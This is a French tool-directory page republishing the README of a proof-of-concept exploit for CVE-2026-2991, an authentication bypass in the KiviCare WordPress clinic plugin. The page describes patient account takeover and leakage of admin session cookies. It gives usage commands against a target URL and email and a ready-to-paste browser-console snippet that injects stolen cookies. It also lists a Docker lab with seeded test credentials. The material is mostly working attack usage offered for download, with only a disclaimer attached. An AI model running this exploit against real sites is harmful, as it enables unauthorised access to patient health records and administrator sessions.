Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-2991 — PoC exploit for CVE-2026-2991 — authentication bypass in KiviCare WordPress plugin (≤4.1.2) allowing unauthenticated patient account takeover and admin session extraction. | Kitploit
Outils/GitHubGitHub/joshuavanderpoll/cve-2026-2991
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubjoshuavanderpoll/cve-2026-2991

CVE-2026-2991

PoC exploit for CVE-2026-2991 — authentication bypass in KiviCare WordPress plugin (≤4.1.2) allowing unauthenticated patient account takeover and admin session extraction.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôtSite web
2il y a 5 moisPas encore vérifié

KiviCare <= 4.1.2 - Contournement d'authentification (CVE-2026-2991) PoC

Python

📜 Description

CVE-2026-2991 est une vulnérabilité de contournement d'authentification dans le plugin WordPress KiviCare – Clinic & Patient Management System (EHR) affectant toutes les versions jusqu'à la 4.1.2 incluse.

Le plugin expose un endpoint REST public à /wp-json/kivicare/v1/auth/patient/social-login qui authentifie les utilisateurs via la connexion sociale. La fonction patientSocialLogin() accepte une adresse email et un jeton d'accès mais ne valide jamais le jeton auprès du fournisseur social revendiqué. Tout attaquant non authentifié peut se connecter en tant que n'importe quel patient enregistré en fournissant uniquement son email et une chaîne arbitraire comme jeton.

De plus, les cookies d'authentification WordPress sont émis avant que la vérification du rôle de patient ne soit appliquée. Cela signifie que pour les comptes non patients (y compris les administrateurs), la réponse renvoie HTTP 403 mais inclut toujours des en-têtes Set-Cookie valides — divulguant une session administrateur rejouable à l'attaquant.

Versions affectées : kivicare-clinic-management-system <= 4.1.2

✨ Fonctionnalités

  • Non authentifié — Aucun identifiant ou session préalable requis
  • Prise de contrôle de compte patient — Connectez-vous en tant que n'importe quel patient enregistré en utilisant uniquement son email
  • Fuite de session administrateur — Extrait des cookies d'authentification administrateur valides de la réponse 403 pour les comptes non patients
  • Extrait de console navigateur — Produit du JavaScript prêt à coller pour injecter des cookies et rediriger directement vers le tableau de bord

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Utilisation

root@kitploit:~
python3 CVE-2026-2991.py --url <TARGET_URL> --email <TARGET_EMAIL> [--login-type <google|apple>] [--timeout <SECONDS>] [--useragent <UA>]

Prise de contrôle de compte patient

Contourne l'authentification d'un patient enregistré. Le script renvoie leur session complète, incluant un nonce et des cookies rejouables.

root@kitploit:~
python3 CVE-2026-2991.py --url 'https://target.com' --email '[email protected]'

Contournement patient


Fuite de session administrateur (compte non patient)

Fournissez l'email de tout utilisateur non patient (par exemple un administrateur). L'endpoint émet des cookies d'authentification valides avant la vérification du rôle et renvoie 403 — ces cookies sont extraits et affichés.

root@kitploit:~
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email '[email protected]'

Fuite de cookies administrateur


Connexion via console navigateur

Après une exécution réussie, le script affiche un extrait JavaScript. Ouvrez le site cible dans votre navigateur, collez l'extrait dans la console du navigateur (F12 → Console), et appuyez sur Entrée — il définit les cookies volés et vous redirige automatiquement vers le tableau de bord.

root@kitploit:~
(() => {
  document.cookie = "wordpress_<hash>=<value>; path=/";
  document.cookie = "wordpress_logged_in_<hash>=<value>; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();

🐋 PoC Docker

Un environnement Docker Compose autonome avec le plugin vulnérable pré-installé et ensemencé avec des données de test réalistes. Consultez DOCKER.md pour plus de détails.

root@kitploit:~
cd docker/
docker compose up

Le laboratoire ensemence les comptes suivants au premier démarrage :

root@kitploit:~
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

🕵🏼 Références

  • KiviCare — WordPress Plugin
  • NVD — CVE-2026-2991
  • WordFence
  • HackIndex.io — CVE-2026-2991

📢 Avertissement

Cet outil est fourni à des fins éducatives et de recherche uniquement. Le créateur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.

Télécharger l’outil
RôleNom d'utilisateurEmailMot de passe
Adminadmin[email protected]admin
Doctordr.harris[email protected]Doctor@123
Doctordr.chen[email protected]Doctor@123
Doctordr.okonkwo[email protected]Doctor@123
Patientjames.ford[email protected]Patient@123
Patientsofia.reyes[email protected]Patient@123
Patientoliver.knight[email protected]Patient@123
Patientamara.diallo[email protected]Patient@123
Patientdan.walsh[email protected]Patient@123